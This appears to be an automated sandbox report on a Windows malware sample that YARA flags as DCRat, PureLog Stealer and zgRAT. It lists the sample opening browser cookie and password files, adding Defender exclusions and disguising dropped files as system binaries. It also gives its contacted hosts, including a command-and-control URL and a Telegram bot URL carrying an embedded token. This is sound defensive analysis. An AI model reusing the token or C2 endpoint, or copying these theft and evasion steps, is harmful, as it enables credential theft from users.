Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: 00000004.00000002.1932393224.0000000013164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: driverInto.exe PID: 5936, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000000.1783939727.0000000000AC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1622104471.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Registration\csrss.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Registration\csrss.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1433033 Sample: Vqzx4PFehn.exe Startdate: 29/04/2024 Architecture: WINDOWS Score: 100 77 api.telegram.org 2->77 79 intopart.top 2->79 81 ipinfo.io 2->81 95 Snort IDS alert for network traffic 2->95 97 Antivirus detection for URL or domain 2->97 99 Antivirus detection for dropped file 2->99 103 11 other signatures 2->103 11 Vqzx4PFehn.exe 3 6 2->11         started        14 svchost.exe 2->14         started        signatures3 101 Uses the Telegram API (likely for C&C communication) 77->101 process4 dnsIp5 75 C:\portintosvc\driverInto.exe, PE32 11->75 dropped 17 wscript.exe 1 11->17         started        89 127.0.0.1 unknown unknown 14->89 file6 process7 signatures8 91 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->91 93 Suspicious execution chain found 17->93 20 cmd.exe 1 17->20         started        process9 process10 22 driverInto.exe 17 22 20->22         started        27 conhost.exe 20->27         started        dnsIp11 83 api.telegram.org 149.154.167.220, 443, 49737, 49773 TELEGRAMRU United Kingdom 22->83 85 ipinfo.io 34.117.186.192, 443, 49732, 49734 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 22->85 59 C:\Windows\Registration\csrss.exe, PE32 22->59 dropped 61 C:\Users\user\Desktop\uCFUtfTN.log, PE32 22->61 dropped 63 C:\Users\user\Desktop\cvopZsny.log, PE32 22->63 dropped 65 8 other malicious files 22->65 dropped 105 Multi AV Scanner detection for dropped file 22->105 107 Adds a directory exclusion to Windows Defender 22->107 109 Drops PE files with benign system names 22->109 29 cmd.exe 22->29         started        32 powershell.exe 22->32         started        34 powershell.exe 23 22->34         started        36 4 other processes 22->36 file12 signatures13 process14 signatures15 117 Uses ping.exe to sleep 29->117 119 Uses ping.exe to check the status of other devices and networks 29->119 38 XXPWErhsUbDrk.exe 29->38         started        57 3 other processes 29->57 121 Loading BitLocker PowerShell Module 32->121 43 conhost.exe 32->43         started        45 WmiPrvSE.exe 32->45         started        47 conhost.exe 34->47         started        49 conhost.exe 36->49         started        51 conhost.exe 36->51         started        53 conhost.exe 36->53         started        55 conhost.exe 36->55         started        process16 dnsIp17 87 intopart.top 172.67.144.153, 49739, 49740, 49741 CLOUDFLARENETUS United States 38->87 67 C:\Users\user\Desktop\nntxgNlb.log, PE32 38->67 dropped 69 C:\Users\user\Desktop\mqRpKNWg.log, PE32 38->69 dropped 71 C:\Users\user\Desktop\fJkHwTWu.log, PE32 38->71 dropped 73 2 other malicious files 38->73 dropped 111 Multi AV Scanner detection for dropped file 38->111 113 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 38->113 115 Tries to harvest and steal browser information (history, passwords, etc) 38->115 file18 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
172.67.144.153
 intopart.top United States
13335 CLOUDFLARENETUS true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
ipinfo.io 34.117.186.192 true
api.telegram.org 149.154.167.220 true
intopart.top 172.67.144.153 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto false
    		high
    http://intopart.top/Eternalpollgeocpu.php true
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    https://ipinfo.io/country false
      		high
      https://ipinfo.io/ip false
        		high